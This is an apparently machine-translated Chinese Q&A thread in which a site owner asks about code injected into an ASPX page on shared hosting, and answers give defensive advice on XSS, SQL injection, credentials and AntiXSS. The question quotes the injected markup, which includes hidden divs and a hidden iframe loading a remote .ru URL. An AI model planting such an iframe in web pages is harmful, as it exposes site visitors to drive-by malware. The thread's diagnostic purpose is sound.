有人将此代码放在我的aspx页面上。
他们在做什么?
他们是怎么做到的?
如何阻止它们?
它位于共享托管服务器上。
它位于一个aspx内容页面上,该页面有一个母版页,位于</asp:content>
标记之后......
<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>
<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>
<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>
<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>
<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>
<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
答案 0 :(得分:39)
让您的网站离线。
不,我是认真的。
将其脱机并查看处理用户输入的所有要点并查看代码并清理每个用户输入和每个输出。有很多关于XSS,代码注入等的文档。
答案 1 :(得分:2)
它是否是另一种自动SQL注入攻击?查看您的日志,看看里面是否有“DECLARE”。 (假设您使用的是SQL Server)
答案 2 :(得分:2)
似乎你不是唯一的一个。 Google为它:
答案 3 :(得分:1)
如何呈现页面 - 是否有来自数据库的内容?什么是网址?你有没有将validateRequest设置为false?
我需要更多信息
答案 4 :(得分:1)
它位于一个aspx内容页面上,该页面有一个母版页,位于
</asp:content>
标记之后......
你是说有人进入你的服务器并编辑了服务器上的.aspx文件?如果是这种情况,请确保已锁定任何文件共享并更改ftp等所有密码。
如果是被渲染的页面被捣碎了,那么来自@squeeks的建议是可行的。
答案 5 :(得分:0)
尝试查看AntiXSS库;重要的页面,关闭它们一段时间。我相信你需要更新代码,在每个网址中使用AntiXSS;将所有直接查询生成切换为基于参数的查询生成;事情将受到控制。此外,关于谷歌/ bing上的白名单项目有很多东西。